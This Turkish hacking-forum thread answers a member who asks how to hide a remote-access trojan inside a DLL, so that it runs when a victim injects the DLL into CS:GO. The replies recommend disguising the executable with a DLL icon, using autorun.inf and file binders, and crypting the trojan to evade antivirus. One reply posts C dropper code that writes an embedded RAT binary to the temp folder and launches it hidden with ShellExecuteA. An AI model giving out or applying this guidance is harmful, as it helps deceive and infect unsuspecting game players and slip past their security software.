Dll Dosyasına Trojan/RAT Nasıl Yerleştirebilirim?

Z

Zehir1903

Üye
13 Nis 2019
69
0
.dll dosyalarına nasıl .exe (RAT) yerleştirebilirim yani istediğim şu
kişi dll dosyasını cs:go ya inject edince bizim ratımızı da çalıştırmasını nasıl sağlayabilirim?
 
P

Professional58

Üye
15 Eyl 2018
219
15
Türkiye
Dostum, DLL Dosyası ile rat yapamazsın ama dll ikonunu alıp yaptığın exe'nin ikonuyla değiştirirsen eğer kurban pek dikkatli biri değil ya da bilgisiz ise rahatlıkla bu dosyayı dll dosyası sanıp çok kolay yiyebilir. Ama tabi kurbanın bu dosyayı çalıştırması gerekir.
Bence autorun.inf yapıp exe yaptıgın dosyayı açtırtmalısın bu dosyadaki kodlarla. Böylece kurbanın açması bile gerekmez. Yalnız İki dosyayı Binder İle Birleştirmelisin ki Tek bir dosya olarak görünsün.
Başka soruların için özel mesaj atabilirsin.
 
Son düzenleme:
M

misting

Üye
12 Eki 2019
75
11
Neptün
Bir dll dosyasını direk olarak trojen kodlarını ekleyemezsin ama bir not defterine trojen kodlarını yazıp onu kayıt ederken mesela örnek verim deneme.dll uzantısını yazıp tüm dosyalar diye kaydedersen bu şekilde dll dosyasına trojen yerleştirmiş olursun
 
d11dd11

d11dd11

Üye
21 Şub 2010
153
0
Zehir1903' Alıntı:
.dll dosyalarına nasıl .exe (RAT) yerleştirebilirim yani istediğim şu
kişi dll dosyasını cs:go ya inject edince bizim ratımızı da çalıştırmasını nasıl sağlayabilirim?
Genişletmek için tıkla ...


RAT'lı exe'nin binary halini bir diziye at, dll içerisinde CreateFile ve WriteFile ile dosyayı oluşturup çalıştır.

örneğin :

Kod: 
[FONT=Arial]const char* bRatFile = { 0xAA, 0xBB, .... }; [COLOR=SeaGreen]// bu kısım hardcoded olmalı yapacak bir şey yok.[/COLOR][/FONT]
[FONT=Arial]char pTemp[256];[/FONT][FONT=Arial]
[/FONT]
[FONT=Arial]HANDLE hFile;[/FONT]
[FONT=Arial]DWORD nbytesWritten;[/FONT]
[FONT=Arial]BOOL status;
[/FONT]
[FONT=Arial]GetTempPathA[/FONT][FONT=Arial](sizeof(pTemp), pTemp);
strcat(pTemp, "test.exe");

hFile = CreateFile(pTemp, GENERIC_READ | GENERIC_WRITE, 0, NULL, [/FONT][FONT=Arial]CREATE_NEW, FILE_ATTRIBUTE_NORMAL);

[COLOR=seagreen]// eğer önceden açılmışsa hFile null gelecek kontrol edersin onu burada
[/COLOR]
status = WriteFile(hFile, bRatFile, strlen(bRatFile), &nbytesWritten, NULL);
[COLOR=seagreen]
// burada status'u kontrol et.[/COLOR]
 
[/FONT][FONT=Arial] ShellExecuteA(NULL, "open", pTemp, NULL, NULL, SW_HIDE);[/FONT]
Başka yolu var mıdır? RAT kodunu dll'in içine yazmak manasız (hadi onu geçelim mümkün mü?) ve muhtemelen oyunların anticheatleri yüzünden hooklanmış bir fonksiyona takılıp crash yiyecektir.
 
Son düzenleme:
areYOUreadyy

areYOUreadyy

Yeni üye
29 Şub 2020
18
0
İnternette birden fazla dosya birleştirme programları bulunuyor. Fakat bunlardan önce trojanını crypt'lasan ( gizlemek) iyi olur. Aksi taktirde dll Antivirüs programları tarafından etkisiz hale gelebilir. Ayrıca bir kaç senedir, antivirüs programını ele geçiren virüsler medyada. Bu virüsleri tehlikeli yapan şey, kullandığın antivirüs programını elinde oyuncak etmesidir. Yoğun bir araştırma sonrası erişebilirsin bu tür bilgilere ..

İyi akşamlar ..
 
areYOUreadyy

areYOUreadyy

Yeni üye
29 Şub 2020
18
0
Aynen bu dosya birleştirmekten daha mantıklı. Fakat RAT görevi görebileceğini sanmıyorum. Sonuçta bir kaç kod ile server bağı oluşturamazsın .. Oluşturulabiliyorsa bilgi verebilirmisiniz ..
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.